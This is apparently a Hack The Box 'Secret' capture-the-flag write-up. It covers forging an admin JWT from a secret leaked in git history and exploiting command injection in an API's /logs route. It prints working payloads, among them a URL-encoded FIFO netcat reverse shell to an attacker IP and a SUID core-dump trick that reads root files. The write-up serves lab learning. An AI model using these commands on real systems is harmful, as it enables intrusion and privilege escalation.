HTB: Secret


Intro:

This box exposes one of my biggest fears: Accidentally leaving creds in a GitHub repo!

Recon:

To start, we run nmap against our target and find open ports: 22, 80, and 3000.
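
The exact flags are a matter of taste; a typical scan that would turn these up (default scripts, version detection, all ports; the IP is the target's):

nmap -sC -sV -p- -oN nmap-secret.txt 10.10.11.120   # full TCP scan, saved for later reference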

We can assume port 22 won't help with anything, so we start with port 80.

This page shows us documentation for an API running on port 3000. There are a lot of token secrets scattered around that we can take note of. Perhaps the creator forgot to remove his test tokens?

Homepage of DUMBDocs on port 80

Further snooping shows us how to authenticate through this API and what we can do after authentication, but it doesn't seem like any of the provided functions are all that useful on their own.

Git-ting to the point:

Right at the bottom of the page we can download the source code for the API. After unzipping and analyzing it, we can see the inner workings of the API. More importantly, we find a .git directory! Inside it we find the git history file, which shows that one of the revisions was made to remediate a security issue: they removed .env, which most likely held environment variables/secrets!

Git history file, revealing useful commit information
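
If you'd rather not dig through .git by hand, plain git commands show the same history from inside the unzipped source (a sketch; the directory name is an assumption and may differ in your download):

cd local-web          # unzipped source directory (name may differ)
git log --oneline     # list commits; one of them mentions removing .env
git show <commit>     # inspect the diff of any commit that looks interesting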

The author's personal website is linked in the footer under "Designed with <3 by Dasith" (here). From there we can move to 'Projects', and right at the bottom he links his GitHub. We find his 'auth-api' repository and go to the commit history. One of the most recent commits is a change with the commit message "Update .env". Bingo! In plain view we can see both the previous and the new "TOKEN_SECRET" environment variable!

Exposed vs current version of the .env file

Forging JWT:

This value isn't itself a JWT (which is what the API expects for authentication), but it looks like the secret used to sign one, meaning we can go to jwt.io and forge our own token [1]. For our specific needs, we want the HS256 alg with the JWT type (the defaults). For the payload we only need one field: "name":"theadmin". This is all we need because, in the source code under routes/private.js, the name field is the only claim the route checks. Finally, paste the TOKEN_SECRET we found into the Verify Signature field and copy out our newly signed, valid token!

Using jwt.io to create a valid token with the stolen secret; the circled area is where the secret goes
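
If you'd rather stay in the terminal, HS256 is just HMAC-SHA256 over base64url(header).base64url(payload), so the token can be forged by hand; a rough openssl sketch (the secret below is a placeholder for the leaked TOKEN_SECRET):

SECRET='<leaked TOKEN_SECRET>'                      # placeholder, paste the real value
b64url() { openssl base64 -A | tr '+/' '-_' | tr -d '='; }
HEADER=$(printf '{"alg":"HS256","typ":"JWT"}' | b64url)
PAYLOAD=$(printf '{"name":"theadmin"}' | b64url)
SIG=$(printf '%s.%s' "$HEADER" "$PAYLOAD" | openssl dgst -sha256 -hmac "$SECRET" -binary | b64url)
echo "$HEADER.$PAYLOAD.$SIG"                        # our forged auth-token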

Once we have our token, we can confirm that we have admin access by contacting the API:

curl http://10.10.11.120:3000/api/priv -H "Content-Type: application/json" -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s'

We should get a JSON response back with a "desc" field saying "welcome back admin"! Now that we're admin, we need to figure out how to get a shell...

Getting User:

Looking back at the source code, we can see there's a route under /logs. If an admin (that's us now) requests this URL, it runs a command that pulls git log output for a file whose name the user supplies. The file name is passed as a parameter named "file" (this is a GET route), which immediately suggests trying command injection.

The /logs route of the source code
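
Nothing fancy is needed to see why this is dangerous: if the route glues the file parameter into a shell string (something like git log --oneline <file>), a semicolon ends the git command and whatever follows runs as its own command. A harmless local illustration (not the server's actual code):

file='; id'                          # attacker-controlled "file name"
sh -c "git log --oneline $file"      # git errors out, then id runs anyway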

To test out a simple command injection, we can start a webserver on our attacking machine and then try to make the target connect back to it.
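
Python's built-in webserver is plenty for catching the callback (port 8000 here, but anything open works):

python3 -m http.server 8000          # serves the current directory and logs every request

Then, from another terminal, send the injection (remember to replace the IP with yours!):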

curl -H "Content-Type: application/json" -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s' 'http://10.10.11.120:3000/api/logs?file=;curl%20<your ip>:8000'

Example of a successful command injection against the target API

We manage to get a connection back to our Python webserver from the target! Using this same cURL trick, we can inject a reverse shell command. After setting up a netcat listener (nc -lvp 3184) we can launch the reverse shell. The target's netcat doesn't support the -e option, so we need the classic FIFO workaround ([3]):

rm /tmp/f
mkfifo /tmp/f  # create a named pipe (FIFO)
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.10 3184 > /tmp/f
# reads commands from the FIFO into an interactive sh,
# sends sh's output to nc (our listener),
# and writes whatever nc receives back into the FIFO, closing the loop

I've taken the liberty of URL-encoding it to prevent any character errors and ensure the command is reliable:

curl -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoidGhlYWRtaW4ifQ.GDRG1ileUj55S0ZdAAZhtUz28Hz4s7fHgqbiES5Qr7s' 'http://10.10.11.120:3000/api/logs?file=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<your ip>%20<your port>%20%3E%2Ftmp%2Ff'
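
If you want to encode your own payload rather than trust mine, Python can do it in one line (IP and port here match the listener from earlier; swap in yours):

python3 -c 'import urllib.parse; print(urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 3184 >/tmp/f", safe=""))'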

We can check our connection with id and see that we are "dasith", which tells us we landed as a real user rather than www-data. We can then grab the user flag from /home/dasith/user.txt.

Getting Root:

Once we're in (and have upgraded our terminal ;D ), we can look for our privilege escalation. The first thing I try is looking for SUID binaries with find / -perm /4000 2>/dev/null. Looking through the list, the binary that sticks out the most is /opt/count. Moving to /opt shows a count binary along with code.c and vagrant.log. Checking the vagrant log yielded nothing but some data about a memory dump. Checking the code.c file shows some interesting results.

The source code shows a small program that reads an input file or directory and outputs information such as the character count, number of files, etc. Running the count binary confirms that code.c is its source code. Never having exploited something like this, I take to Google, where I find a single useful blog post explaining exactly how to exploit it (although in hindsight that blog may well have been written as an answer to this box, so we'll dig into how it works to prove we're actually learning) [2].

This blog explains that we can read any file as root (thanks to the SUID bit) by running the vulnerable binary and crashing it right after it has read the target file. Done properly, this generates a crash report containing the file contents that were still in the process's memory: once the binary has read a file, if it doesn't scrub those contents from memory before we crash it, the core dump lets us view them! Note: we need to put the binary in the background, which requires [ctrl+z], so if your shell isn't upgraded to a fully interactive TTY yet, now is the time.
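
For reference, the usual upgrade dance (assuming python3 exists on the target):

python3 -c 'import pty; pty.spawn("/bin/bash")'   # get a real TTY on the target
# hit [ctrl+z] to drop back to your own machine, then:
stty raw -echo; fg                                # raw mode locally, resume the shell
# press Enter and you have a fully interactive shell (job control, ctrl+c, ctrl+z)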

Step 1: Run the binary. Ours works by first asking for a file path, then asking whether we want to save the results. We pass it the target file /root/root.txt (which we can locate using this same binary: /opt/count <<< /root), and once it asks whether to save the output, we background the binary.

Step 2: Suspend the binary and crash it. [ctrl+z] puts it in the background; then we find its PID with ps aux | grep count. We need it to die from a segmentation fault for a crash report to be written: killing it with SIGKILL (9) wouldn't leave one behind, so we send SIGSEGV (11) instead. Once we do, we bring the process back to the foreground with fg and it goes down with a seg fault!
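
Putting steps 1 and 2 together, the whole sequence looks roughly like this on the target:

/opt/count                    # prompts for a path: enter /root/root.txt
# when it asks whether to save the results, hit [ctrl+z] to suspend it
ps aux | grep count           # note the PID of the suspended process
kill -SEGV <PID>              # send signal 11 (SIGSEGV)
fg                            # resume it; it segfaults and apport writes a crash report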

Step 3: Retrieve the crash report. On Ubuntu, the /var/crash directory holds apport crash reports, including the one for our count program. We can quickly make an empty directory (/tmp/miked) and use the apport-unpack command to write the crash contents into it:

apport-unpack /var/crash/<your file name>.crash /tmp/miked

This will create multiple new files, but we only need CoreDump. Cat it and look for the line that looks like the flag and we're done!
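
The CoreDump itself is a binary blob, so strings is friendlier than a plain cat; HTB flags are 32 hex characters, which makes for an easy grep:

strings /tmp/miked/CoreDump | grep -E '[0-9a-f]{32}'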

Full example of how to force a crash report

The temp directory after the apport command, and the extracted flag!




Resources:

[1] JWT builder [EXTERNAL]

[2] SUID Core Dump [EXTERNAL]

[3] Netcat Web Friendly




Last edit: 2022.02.27